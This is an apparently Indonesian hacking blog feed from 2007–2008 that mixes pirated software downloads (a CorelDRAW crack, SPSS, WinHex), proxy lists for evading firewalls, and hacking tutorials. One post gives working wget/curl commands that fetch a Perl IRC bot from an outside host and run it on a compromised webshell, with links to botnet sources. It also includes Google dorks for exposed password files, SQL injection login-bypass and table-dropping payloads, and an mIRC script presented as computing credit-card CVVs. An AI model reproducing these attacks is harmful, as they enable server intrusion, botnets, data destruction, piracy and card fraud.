Seni Internet Hacking

noreply@blogger.com (gresikblog) — Thu, 31 Jan 2008 11:00:00 +0000

X-Ways WinHex v14.7 SR-1 | 1.5mb
WinHex: Computer Forensics & Data Recovery Software, Hex Editor & Disk Editor
Windows 98/Me/2000/XP/2003/Vista/2008

WinHex is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security. An advanced tool for everyday and emergency use: inspect and edit all kinds of files, recover deleted files or lost data from hard drives with corrupt file systems or from digital camera cards.

Features include (depending on the license type):

-- Disk editor for hard disks, floppy disks, CD-ROM & DVD, ZIP, Smart Media, Compact Flash, ...
-- Native support for FAT, NTFS, Ext2/3, ReiserFS, Reiser4, UFS, CDFS, UDF
-- Built-in interpretation of RAID systems and dynamic disks
-- Various data recovery techniques
-- RAM editor, providing access to physical RAM and other processes' virtual memory
-- Data interpreter, knowing 20 data types
-- Editing data structures using templates (e.g. to repair partition table/boot sector)
-- Concatenating and splitting files, unifying and dividing odd and even bytes/words
-- Analyzing and comparing files
-- Particularly flexible search and replace functions
-- Disk cloning (under DOS with X-Ways Replica)
-- Drive images & backups (optionally compressed or split into 650 MB archives)
-- Programming interface (API) and scripting
-- 256-bit AES encryption, checksums, CRC32, hashes (MD5, SHA-1, ...)
-- Erase (wipe) confidential files securely, hard drive cleansing to protect your privacy
-- Import all clipboard formats, incl. ASCII hex values
-- Convert between binary, hex ASCII, Intel Hex, and Motorola S
-- Character sets: ANSI ASCII, IBM ASCII, EBCDIC, (Unicode)
-- Instant window switching. Printing. Random-number generator.
-- Supports files >4 GB. Very fast. Easy to use. Extensive online help. (more)

Having all the bits and bytes in a computer at your fingertips has become a reality.

http://www.paid4share.com/file/3273/X-Ways-WinHex-v14-7-SR-1-rar.html

Arial Audio Converter 2.3.58

noreply@blogger.com (gresikblog) — Thu, 31 Jan 2008 10:55:00 +0000

Arial Audio Converter is a professinal audio conversion tools. It can convert audio formats between MP3, WMA, OGG, MP2, WAV( PCM, DSP, GSM, ADPCM), G721, G723, G726, VOX, ALAW, ULAW. Arial Audio Converter is an audio utility that converts file with built-in playback player. With this extremely easy to use software you can convert files in batch regardless of their source formats and target formats. Arial Audio Converter also supports playback with its built-in player.

http://depositfiles.com/files/3311691
http://www.megaupload.com/?d=EZOXHWWW

SPSS 11.5.1 For Windows

noreply@blogger.com (gresikblog) — Thu, 31 Jan 2008 10:50:00 +0000

SPSS 11.5.1
RAR | RS | OS:Win | 463 Mb

SPSS 11.5 will make it easier for my company to deliver well-crafted market research, providing clients with the critical information they require in order to make better business decisions.SPSS® 11.5 for Windows® and SPSS Server 11.5 for Window NT®/2000. This version of SPSS features a new clustering analysis technique, better reporting capabilities, improved data management and enhanced workflow.
More than 250,000 organizations worldwide rely on SPSS for Windows for conducting survey research, database analysis and scientific research. An advanced statistical and data management package, SPSS 11.5 provides an easy-to-use, comprehensive offering for the entire analytical process – planning, data collection, data access and management, analysis, reporting and deployment.

http://rapidshare.com/files/87920826/SPSS.part1.rar
http://rapidshare.com/files/87923205/SPSS.part2.rar
http://rapidshare.com/files/87922079/SPSS.part3.rar
http://rapidshare.com/files/87924538/SPSS.part4.rar
http://rapidshare.com/files/87910617/SPSS.part5.rar

Pass: invincible2

save2pc Pro v3.25

noreply@blogger.com (gresikblog) — Thu, 31 Jan 2008 10:44:00 +0000

Save2pc is a tool that downloads videos from Youtube or Google Video and saves it as Avi or Mpeg or Flv file to your local computer. save2pc is a small, fast, useful, practical and powerful. It has a clean, simple interface. save2pc allows you to easily grab and save desired youtube video. The user interface of save2pc is very simple, so you don't need any technical knowledge to use it. No need to use scripts for web browsers. Just run save2pc and start downloading!

Features
Simply paste the URL of a video into the program, press Start , and the AVI, MPEG or FLV file will be downloaded into the selected folder. You dont need any players to play flash video just play it on the defult media player clasic.

- Easy to use
- Download from Youtube
- Download from Google Video
- Save youtube video as an AVI file
- Save youtube video as an MPEG file
- Save youtube video as an FLV file

save2pc will work with Windows 95, 98, Me, NT, 2000, XP, 2003, Vista operating systems.

Download
Save2pc-Pro-v3-25 (paid4share.com)
---------------------------------------------------------------------------------------------
Mirror:
http://depositfiles.com/files/3317228

http://w13.easy-share.com/1698728121.html

CorelDRAW Graphics Suite X4 Portable (14.0.0.567)

noreply@blogger.com (gresikblog) — Thu, 31 Jan 2008 10:39:00 +0000

CorelDRAW® Graphics Suite X4 lets you tackle creative graphics and design projects with confidence. Precision tools, market-leading file compatibility and high-quality content help you turn your creative ideas into professional results: from distinctive logos and signs, to striking marketing materials and eye-catching web graphics.

CorelDRAW Graphics Suite X4 provides all of the graphics tools you need to:
Illustrate : using powerful vector tools
Layout : your designs
Edit : and enhance digital images
Convert : bitmap images to vector files

Plus, CorelDRAW Graphics Suite X4 comes packed with additional applications and services to help meet your graphics needs. The suite truly offers the ultimate combination of superior design capabilities, speed, and ease of use.

New and Enhanced Features

>> Streamline your workflow
- Modernized user interface:
The new, more intuitive user interface features redesigned icons, menus and control
- CorelDRAW® ConceptShare™:
Share your designs and ideas with colleagues and collaborate with clients in real time
- Corel® PowerTRACE™ X4:
Save time and enjoy more control with this enhanced and powerful bitmap-to-vector conversion solution
- Windows® Color System:
Closely match colors between Corel and Microsoft applications
- Adobe® Color Management Module:
Match colors between Corel and Adobe applications

>> Find your design assets
- Enhanced Windows Vista® integration:
Organize projects and search for files
- New, editable content:
10,000 clipart images (40% new), 1,000 high-quality photos and more specialized fonts: includes 75 Windows Glyph List 4 (WGL4) with support for Greek, Cyrillic and other international character sets, as well as single-line engraving fonts and OpenType® cross-platform fonts
- Redesigned New From Template dialog box:
Easily find the right template for any job, and browse by keyword or industry
- 80 professionally designed templates:
With keywords, notes about design choices, output tips and ways to maintain good design when customizing templates

>> Accelerate layout and text editing
- Interactive tables:
Create and import structured layouts for text and graphics
- Independent page layers:
Vary page layout within a multipage document
- Live text formatting:
Preview formatting changes before applying them
- Integration with WhatTheFont™:
Quickly identify fonts
- Mirror paragraph text:
Mirror text horizontally or vertically, or both

>> Get inspired and gain knowledge
- Welcome screen:
Access recently used documents, templates, learning tools, and inspiring designs from one location
- CorelDRAW® Handbook - Insights from the Experts:
View impressive projects and learn from seasoned design professionals
- Training videos:
Delve into hours of new training videos
- CorelTUTOR™:
Access online, project-based instruction with new tutorials
- CorelDRAW.com:
Share designs, ideas and inspiration with this online community

>> Discover advanced image-editing features
- Support for RAW camera files:
Interactive controls let you preview adjustments in real time
- Straighten images:
New, interactive controls make it fast and easy
- Histogram feedback:
Available with more features than ever before
- Enhanced Tone Curve dialog box:
Lets you adjust images with more precision
- Streamlined page sizes:
Reflect the geographic location of the user better

http://rapidshare.com/files/87470775/Core1DR4W.Craphics.5uite.X4.Portable.rar

Posted By: redwhiterus Date: 30 Jan 2008 03:33

Mirror: http://depositfiles.com/files/3298145
------------------------------------------------------------
Here is Installer + Crack

RS Links:
http://rapidshare.com/files/86367098/CDX4.part1.rar
http://rapidshare.com/files/86367186/CDX4.part2.rar
http://rapidshare.com/files/86367275/CDX4.part3.rar
http://rapidshare.com/files/86367310/CDX4.part4.rar

Surat Cinta Seorang Hacker

noreply@blogger.com (gresikblog) — Tue, 13 Nov 2007 03:15:00 +0000

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk
mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku
c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang
anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku
seperti pecundang atau aku memang pecundang sejati whatever!
Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection
Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di
hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?.
apa aku harus pasang backdor "Remote Connect-Back Shell"jadi aku
tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti
ini.
Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq
untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku
akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu
aku akan pasang portsentry, dan menyeting error pagemu " The page
cannot be found Coz Has Been Owned by Someone get out!" aku janji gak
bakalan ada macelinious program atau service yang hidden, karena aku
sangat sayang dan mencintaimu.
Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku,
kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu harus
menjadi sang bidadari penyelamatku.
Seandainya hatimu adalah sebuah system, ...?
Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah
terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat
menangkalnya selain ...kamu.

Hide Your IP, Surf Anonymous

noreply@blogger.com (gresikblog) — Mon, 05 Nov 2007 08:11:00 +0000

Internet has become a fountain of information that most people use on a daily basis for information, education, entertainment, work and play. Unfortunately, the convenience of the Internet also comes with hidden dangers. Online crimes are on the rise and are constantly evolving technologically.

With the web base proxy allows you to surf the world wide web safely and anonymously. In addition, this allows you to bypass Company/School firewalls and proxies, allowing you to browse your favourite blocked websites, such asmyspace.com and ebay.com at work or school, while your friends and colleagues cannot.

There is thousand of web proxy that you can use. Below are sample of proxies:
http://www.1freeproxy.com/
http://www.proxygalaxy.com/
http://www.pussyproxy.com/
http://www.freeproxyguru.com/
http://www.hotdogproxy.com/

Free Friendster Layouts

noreply@blogger.com (gresikblog) — Mon, 05 Nov 2007 08:08:00 +0000

Dibawah ini adalah beberapa link untuk merubah code CSS atau mengkreasikan tampilan layout / skins friendster agar friendster kita terlihat lebih menarik.

http://www.pingafriend.com/
http://spider-layouts.com/
http://friendster-layouts.com/
http://www.friendsterlayouts.org/
http://www.freefriendsterskins.com/
http://friendster-skins.otezz.net/
http://www.friendstercode.net/
http://www.pyzam.com/friendsterlayouts
http://www.freecodesource.com/friendster-layouts/

Buat bot perl dan botscan

noreply@blogger.com (gresikblog) — Mon, 05 Nov 2007 01:20:00 +0000

Saking banyaknya bot perl sampai-sampai jadi binggung mau pakai yang mana.
ada yang botperl yang bisa scan trus bisa nmap, trus bisa juga di jadiin shell, banyak banget pilihannya……..

langsung aja dehh… pusing jadinya mikirin itu semuaa….

untuk load botperl peralatan yang sangat perlu adalah source botperlnya dan juga shell atau webshell yang ber-safe mode off.

kalau webshellnya ber-safe mode on, nggak bisa di gunakan untuk meload bot, soalnya nggak ada untuk memasukkan perintah, tapi lain halnya dengan menggunakan include. (lain waktu bahasnya yach…)
yang ber-safe mode on bisa di gunakan untuk membuat botphp dengan cara injek lihat cara buatnya di buat-bot-php-dengan-injekan dengan injekan.
kalau yang webshell safe mode off bisa untuk meload botperl karena ada untuk mengetikan perintah.

kalau udah ada source botperl dan juga target tinggal lanjutkan dengan meload bot.

sebenarnya masih banyak jalan untuk bisa meload bot, sama halnya dengan bot-bot yang lain.
yang lebih enak juga kalau udah ada web hosting sendiri sebagai penyimpanan data source code bot, atau juga injekan-injekannya sepeti r57shell, c99shell atau c100, dan juga GFSshell dEel El deh.

kalau memang nggak ada web hosting yach tinggal di buat aja ko, gampang banget, khan banyak situs gratis tuhh yach jadiin aja tuh tempat nyimpen data, khan enakk….. untuk web yang gratis dapat di lihat di free-web-hosting

singkatnya, yang di butuhkan adalah :
1. web/situs/webhosting.
untuk menyimpan source code, injekan, atau data lain.
2. source code botperl.
kalau nggak ada sourcenya, yach nggak jadi deh buatnya, paling botnya masuk chan orang lain kalau kamu load pake botorang lain .
3. shell/webshell.
kalau webshell yang ber-safe mode off.
kalau semua udah ada tinggal kerjaannya langsung atau loadbotnya langsung.

langkah kerjanya :

kalau untuk sekaligus menjalankannya.
wget http://henca.prohosts.org/chibot.txt;chmod 755 perl chibot.txt;perl chibot.txt;rm -rf chibot.txt;ls -la

kalau download sourcenya tidak bisa menggunakan wget, dapat juga dengan menggunakan :
lwp-download
curl
fetch
GET

untuk contohnya penggunaannya dengan cara :

lwp-download http://henca.prohosts.org/chibot.txt
curl -o botperl.txt http://henca.prohosts.org/chibot.txt atau curl -o http://henca.prohosts.org/chibot.txt
penggunaan pilihan -o untuk membuat nama file baru dengan nama botperl.txt
fetch http://henca.prohosts.org/chibot.txt
GET http://henca.prohosts.org/chibot.txt

untuk jelasnya dari cara diatas kalau satu-satu gini neh, cara di bawah ini sama dengan yang ada di atas. :

wget http://henca.prohosts.org/chibot.txt [enter]
chmod 755 perl chibot.txt [enter]
perl chibot.txt [enter]
rm -rf chibot.txt [enter]
ls -la [enter]

penjelasannya :

wget http://henca.prohosts.org/chibot.txt [enter] <– memasukkan sourcenya kedalam komputer/situs target
chmod 755 perl chibot.txt [enter] <— memberikan permision execute peda file chibot.txt, boleh juga nggak
perl chibot.txt [enter] <– menjalankan file bot dengan perintah perl karena itu file perl boleh juga ekstensinya *.pl
rm -rf chibot.txt [enter] <– menghapus file chibot.txt
ls -la [enter] <– melihat file

kalau mau menjalankan botperl yang khususnya, menggunakan webshell, harus di tempat yang permnya 777, supaya lebih leluasa wgetnya.
atau kita juga bisa pindah direktory ke /tmp atau dengan mengetikan cd yang di ikuti dengan perm 777 misalnya cd /tmp karena biasanya direktory /tmp permnya 777, tapi nggak semua server loh gitu, tergantung kalau emang kita beruntung.

kalau ada yang kurang ntar saya tambah, kayaknya neh tulisan belum sempurna…
namanya juga belajar khan.

oh iya nehh source botscannya ama botperl dan juga botnet.
http://scan.prohosts.org/main.txt <– Botscan yang baru
http://henca.prohosts.org/chibot.txt <– yang ini scanner shellbot
http://henca.prohosts.org/netdo.txt <– yang ini botnet
http://henca.prohosts.org/scan9.txt <— yang ini punya botscan morgan v9
http://scan.prohosts.org/botscan.txt <– yang ini botscan tapi versi lama

Google Hacking Tutorial

noreply@blogger.com (gresikblog) — Sat, 03 Nov 2007 02:02:00 +0000

—————————————————
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan “Want to learn”, tidak
kepada pihak-pihak yang ingin merugikan orang lain.

—————————-[ Google Hacking ]—————————-

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.

Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik
dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan
keyword yang sering digunakan untuk melakukan pencarian file dan juga
bagaimana mencari target dengan memanfaatkan Google.

— Penggunaan Dasar ———————————————–

- Google tidak “case sensitive”.
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama

- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata “menjadi” dan “hacker”

- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR c**c*er
Hasilnya pencarian akan mengandung kata “hacker” atau “c**c*er”

- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
“how” dan “where”. Jika kata-kata umum ini begitu penting, anda
bisa menambahkan “+” didepan keyword tersebut.
Keyword: hacker how ==> Kata “how” akan diabaikan
Keyword: hacker +how ==> Kata “how” akan diikutsertakan

- -: Tanda minus “-” bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
“linus tanpa linux”, kita bisa menggunakan “linus -linux”

- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata “menjamu”, “menjadi”, “menjalar”, dll
Google akan menghasilkan pencarian hanya yang mengandung kata
“menja”.

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: “menjadi * hacker”
Hasilnya pencarian dapat menghasilkan “menjadi seorang hacker”,
“menjadi white hacker”, dll.

- “”: Dapat digunakan untuk mencari kata yg lengkap.
Keyword: “menjadi hacker”
Hasilnya pencarian akan mengandung kata “menjadi hacker”

- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3

— Operator Spesial ———————————————–

– Contoh hasil pencarian –

Google –> Judul
… Language Tools. Ways to help with tsunami relief ’
Advertising Programs - About Google ©2005 Google - > Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 –> URL

– Contoh hasil pencarian –

- intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman “Admin” dengan
deskripsi “Administrasi”

- allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata “Admin” dan “Administrasi”

- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata “Admin”
dengan deskripsi “Administrasi”

- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata “Admin”
dan “Administrasi”

- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site “echo.or.id”

- cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.

- define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker

- filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: “hacker” filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html

- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com

- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com

— Manipulasi URL Google ——————————————

> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aboleh-hacking.com&btnG=Search

> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aboleh-hacking.com&btnG=Search

> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search

> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aboleh-hacking.com&btnG=Search

> safe=off: arti dari variabel ini filter “SafeSearch” dimatikan. “SafeSearch”
untuk memfilter hasil pencarian sexual.

Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri
Karena bandwidth di Indonesia mahal ……..

Contoh script google.html lengkap dengan varabielnya.

— BOF google.html —

— EOF google.html —

Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda
Berikut merupakan script default pencarian google.

— BOF google.html —

— EOF google.html —

Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com

— Tips & Tricks ————————————————–

Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.

Ex:
- Keyword: site:boleh-hacking.com, menghasilkan semua site echo.or.id. Kemudian
anda bisa mencoba keyword: site:boleh-hacking.com hacker, akan menghasilkan
semua site boleh-hacking.com yang mengandung kata hacker.

Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education

Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

intitle:index of intitle:mp3 -html -htm name size
intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size
intitle:index of intitle:cgi-bin password -html -htm name size

inurl:”admin.mdb” -html
inurl:”password.mdb” -html
inurl:”data.mdb” -html
“phpMyAdmin” “running on” inurl:”main.php”
intitle:”PHP Shell” “Enable stderr” php

Masih banyak lagi keyword yang bisa ditemukan disini [5]

— Referensi ——————————————————

[1] http://www.google.com/help/basics.html
[2] http://www.google.com/help/features.html
[3] http://www.google.com/help/refinesearch.html
[4] http://www.google.com/help/interpret.html
[5] http://johnny.ihackstuff.com/
[6] O’Reilly - Google Hacks

DASAR-DASAR SQL INJECTION 1

noreply@blogger.com (gresikblog) — Sat, 03 Nov 2007 00:19:00 +0000

                            *-----------------------------------------------------------*
                   |              DASAR-DASAR SQL INJECTION 1                  |
                   *-----------------------------------------------------------*
      *      by : the_day  ;the_day@echo.or.id      *
                          |   Greetz to echo staf : y3dips,moby,comex;SARAH    |
                          *                          *
                          *-----------------------------------------------------------*

Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan
kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL  Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :



Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .
  
   Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection
dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna .
-----------------------------------------------------------------------------------------------------------------------
Sumber Bacca : http://securityfocus.com/articles/SQLinjectionBasicTutorial.php
       http://www.securiteam.com/securityreviews

Script Cek CVV Credit Card Lewat mIRC

noreply@blogger.com (gresikblog) — Thu, 01 Nov 2007 03:43:00 +0000

Ini adalah script buat ngecek cvv dari kartu kredit.
perlu dicatat 90% hasilnya adalah benar… bukan pasti benar.

caranya, buka irc (ga perlu konek ke server). klik Alt+R
nah akan keluar box. pada tab remote tsb, masukkan script di bawah ini :

alias f5 cvv2 menu status,channel,query { - Cari CVV:cvv2 } alias cekcvv2 { set %cv1 $left(%cc,8) set %cv1.1 $right(%cv1,1) set %cv2 $left(%cc,12) set %cv2.2 $right(%cv2,1) set %cv3 $left(%cc,3) set %cv3.3 $right(%cv3,1) set %cv4 $left(%cc,1) set %cv4.4 $calc(%cv3.3 + 1) set %cvv2 %cv1.1 $+ %cv2.2 $+ %cv4.4 set %cvv $left(%cvv2,3) .timer 2 2 /echo CVV dari %cc adalah %cvv Sikat!!! .timer 1 5 /echo —– CVV2 Edited by LeNK #balihackerlink on DALNet —–
